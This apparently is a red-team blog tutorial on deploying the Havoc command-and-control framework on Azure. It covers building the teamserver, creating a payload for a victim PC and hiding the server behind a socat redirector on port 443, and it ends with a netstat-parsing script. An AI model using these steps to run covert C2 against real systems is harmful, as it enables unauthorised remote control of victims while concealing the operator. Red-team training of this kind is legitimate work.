Red Teaming — Install C2(Havoc) framework & Setting up C2 Redirectors on Azure
Hello everyone, this is my second post in the red team series. In the previous article I discussed the installation of BloodHound Community Edition on Kali Linux [Bahasa].
Before we get into what Havoc, C2 and C2 redirectors are and why we need them, let's cover some basics.
HAVOC
According to the Havoc GitHub repository, "Havoc is a modern and malleable post-exploitation command and control framework", and it was created by @C5pider. Its latest documentation says it works well on Debian 10/11, Ubuntu 20.04/22.04, and Kali Linux. Havoc C2 comprises a Teamserver and a Client, utilizing a customizable profile to emulate an adversary's tactics. The Havoc Teamserver operates the configured profile and interacts with "sessions" (similar to Cobalt Strike beacons) that check in from compromised hosts. Meanwhile, the Havoc Client connects to the Teamserver, offering a user interface (UI) akin to Cobalt Strike, which facilitates the management of beacons, listeners, payloads, and various other functions. The installation documentation can be found on the Havoc Framework website.
C2
C2 (Command and Control) servers are utilized by numerous (not all) APT (Advanced Persistent Threat) groups to manage compromised systems and conduct further malicious activities. Also referred to as C&C servers or C2 nodes, these servers play a crucial role in cyberattacks by enabling threat actors to operate remotely.
C2 Redirector
C2 redirectors function similarly to other redirectors by routing traffic from one host to another. In the context of C2 operations, they help conceal the communication between a victim machine and a malicious server, making it appear as though the traffic is regular HTTPS traffic. To enhance this deception, one could set up an Apache server, a domain, and an SSL/TLS certificate to make the traffic seem more legitimate, but this topic is beyond the scope of this article.
Network Diagram
We will use Kali Linux as our attacking machine, Ubuntu as the C2 server (Azure), Ubuntu as the C2 redirector (Azure), and a Windows 10 machine as the victim. The public IP addresses will be:
Attacker Devices : Redacted
Azure Havoc Server : 20.2.220.235
Azure Havoc Redirector : 20.255.51.140
Victim PC : Redacted
*Note — the techniques shown in this article are for educational purposes ONLY, and must not be used on digital assets without prior consent from the owner.
Like I said earlier, the installation documentation on the Havoc website is what I used to perform the installation, and it was easy to follow along. Since I was using the latest Ubuntu server, there were only a few things outside of the installation instructions that I needed to do, which are highlighted below.
Deploy Server on Azure
HavocServer
First, let's create a virtual machine in Azure and create a new resource group.
Then select the image and spec size you want to use. Here I use the latest Ubuntu and a spec size of 2 CPUs and 4 GB RAM for the Havoc server. Click Review + create and wait until the server is deployed.
Log in to the deployed Havoc server and run the following command to update it.
sudo apt update && sudo apt upgrade
Download the Havoc framework
git clone https://github.com/HavocFramework/Havoc.git
Install Golang and Python (the PPA name is deadsnakes; the original post had it misspelled)
sudo apt install golang-go
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt update
sudo apt install python3-dev python3.10-dev libpython3.10 libpython3.10-dev python3.10
Install additional Go dependencies (these are run from the Havoc/teamserver directory, as in the Havoc installation docs)
cd Havoc/teamserver
go mod download golang.org/x/sys
go mod download github.com/ugorji/go
cd ..
Create a custom profile (from the Havoc root directory; the profile defines the teamserver port and the operator users and passwords used later to log in)
nano profiles/havoc.yaotl
Build and run the teamserver
make ts-build
./havoc server --profile ./profiles/havoc.yaotl -v --debug
After that we return to the Azure page, enter the resource group that we created, and open the Havoc server virtual machine's configuration.
Go to the Network settings page and create an inbound port rule.
Add the Havoc port, 40056. Since this port is the teamserver's operator interface, restrict the rule's source to your own public IP rather than Any.
HavocRedirector
Next we create a new virtual machine as the redirector. Don't forget to put the redirector server into the resource group that we created earlier, so that the Havoc server and the redirector server can talk to each other over the private network.
The steps are the same as for the previous machine, but here I use 1 CPU and 1 GB RAM to save on cost.
Run the following command on the Havoc redirector server to update it
sudo apt update && sudo apt upgrade
Because this server is the redirector, we need the socat tool, so don't forget to install it first.
sudo apt install socat
Checking Configuration
If the Havoc server and the redirector are deployed in the same resource group, it will look like this.
Make sure your Havoc server and Havoc redirector are on the same network segment. Their local IP addresses are:
HavocServer : 10.2.0.4
RedirectorServer: 10.2.0.5
Install Havoc client on Attacker devices
On the attacker device (Kali Linux), install Havoc with the following command.
sudo apt install havoc
Then run the Havoc client
havoc client
Setting up C2 Redirectors
Let's do the C2 redirector setup. Go back to Azure and open the HavocRedirector configuration page, then press the Network settings tab.
Create an inbound port rule.
Add port 443.
Let’s ROCK!
After the configuration and installation process is complete, let's use Havoc together with the C2 redirector.
Run the Havoc server
./havoc server --profile ./profiles/havoc.yaotl -v --debug
Open the Havoc client on the attacker device and fill in the required fields.
Name : Rio
Host : 20.2.220.235 (the public IP of the Azure HavocServer)
Port : 40056
User : riodrwn (the user that was created in the HavocServer's havoc.yaotl)
Password : redacted (the password that was created in the HavocServer's havoc.yaotl)
Successful login to the Havoc client
Create a listener
Enter the public IP of the HavocRedirector as the listener host
Let's create the payload that we will run on the victim PC
Don't forget to select the redirector listener that we just created.
Next, SSH into the HavocRedirector server and run the following command, which forwards port 443 on the redirector to port 443 on the HavocServer's private IP (10.2.0.4).
sudo socat TCP4-LISTEN:443,fork TCP4:10.2.0.4:443
Deploy the payload on the victim PC and run it.
We can now see that we have a session from the victim PC in our Havoc client application.
This hides our C2 server from the target, because the victim only ever talks to the redirector, and our activity is tunnelled through it. To confirm that the redirector's IP, and not the teamserver's, is the one connected to the victim PC, you can check with the following command.
netstat -at
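As an added example (not from the article or the Havoc project), here is a small Python triage script for that check: it parses `netstat -at` output from the victim (a constructed Windows-style sample is embedded; Linux-style rows are accepted too) and reports which external IPs hold ESTABLISHED connections, so you can confirm that only the redirector's address, and never the teamserver's, is visible from the host. The two IPs are the article's; the function names and sample rows are assumptions.

```python
import ipaddress
import re

# Constructed sample of `netstat -at` from a Windows 10 host (not captured from the article's lab);
# 20.255.51.140 is the article's redirector public IP.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    10.0.0.15:49712        10.0.0.1:445           ESTABLISHED
  TCP    10.0.0.15:49833        20.255.51.140:443      ESTABLISHED
  TCP    10.0.0.15:49840        20.255.51.140:443      TIME_WAIT
  TCP    [::]:445               [::]:0                 LISTENING
  UDP    0.0.0.0:123            *:*
"""

# Matches Windows rows ("TCP local foreign STATE") and Linux rows ("tcp recvq sendq local foreign STATE").
ROW_RE = re.compile(r"^\s*(tcp|udp)6?\s+(?:\d+\s+\d+\s+)?(\S+)\s+(\S+)(?:\s+(\S+))?\s*$", re.IGNORECASE)


def split_endpoint(endpoint):
    """'20.255.51.140:443' -> ('20.255.51.140', 443); '[::]:0' -> ('::', 0); '*:*' -> ('*', None)."""
    host, _, port = endpoint.rpartition(":")
    if port.isdigit():
        port = int(port)
    elif port == "*":
        port = None  # wildcard, not a connection
    return host.strip("[]"), port  # a service name such as "https" is kept as printed


def established_external_peers(netstat_text):
    """Map each non-private remote IP with an ESTABLISHED TCP connection to the set of remote ports."""
    peers = {}
    for line in netstat_text.splitlines():
        m = ROW_RE.match(line)
        if not m or m.group(1).lower() != "tcp" or m.group(4) != "ESTABLISHED":
            continue
        host, port = split_endpoint(m.group(3))
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            continue  # netstat printed a resolved hostname; only raw IPs are triaged here
        if ip.is_private or ip.is_loopback or ip.is_link_local or port is None:
            continue
        peers.setdefault(str(ip), set()).add(port)
    return peers


def only_redirector_visible(peers, teamserver_ip, redirector_ip):
    """True when the host talks to the redirector and the teamserver IP never appears."""
    return redirector_ip in peers and teamserver_ip not in peers
```

From a defender's side the same output is a triage signal: a long-lived ESTABLISHED session to a bare public IP on 443 with no matching DNS name is worth a closer look.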
Note: As a disclaimer, all the activities performed above are just the basic technical part of red teaming, and if applied to actual red teaming engagements they will be detected by AV/EDR. Next I might post another article on a stealthier approach with more operational security (OPSEC), such as AV/EDR bypass or payload encryption.
I hope this article can help readers gain a new point of view on the red teaming world. Thanks for reading!
References:
https://medium.com/@harellevy159/setting-up-c2-redirectors-with-havoc-132bf53033d1
https://havocframework.com/docs/installation